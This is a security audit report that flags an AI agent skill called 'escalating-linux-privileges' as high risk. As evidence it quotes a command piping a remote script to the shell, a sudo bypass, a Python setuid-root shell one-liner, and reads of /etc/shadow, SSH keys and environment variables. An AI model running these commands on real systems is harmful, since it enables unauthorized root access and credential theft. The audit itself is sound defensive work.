Skills
skills/trilwu/secskills/escalating-linux-privileges/Gen Agent Trust Hub

escalating-linux-privileges

Fail

Audited by Gen Agent Trust Hub on Mar 21, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill instructs users to download and execute scripts directly from third-party GitHub repositories by piping them to the shell.
  • Evidence: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh in SKILL.md.
  • [EXTERNAL_DOWNLOADS]: Multiple automated enumeration and exploitation tools are fetched from various individual GitHub repositories.
  • Evidence: Downloads include LinPEAS, LinEnum, Linux Smart Enumeration (lse.sh), and pspy64.
  • [COMMAND_EXECUTION]: Provides extensive methods for escalating privileges and bypassing security constraints.
  • Evidence: Commands for sudo bypass (e.g., sudo -u#-1 /bin/bash), SUID/SGID exploitation, and capability abuse (e.g., python -c 'import os; os.setuid(0); os.system("/bin/bash")').
  • [DATA_EXFILTRATION]: Contains instructions to search for and read highly sensitive files containing credentials.
  • Evidence: Commands to access /etc/shadow, SSH private keys (id_rsa), environment variables (/proc/self/environ), and database configuration files.
Recommendations
  • HIGH: Downloads and executes remote code from: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 21, 2026, 01:18 AM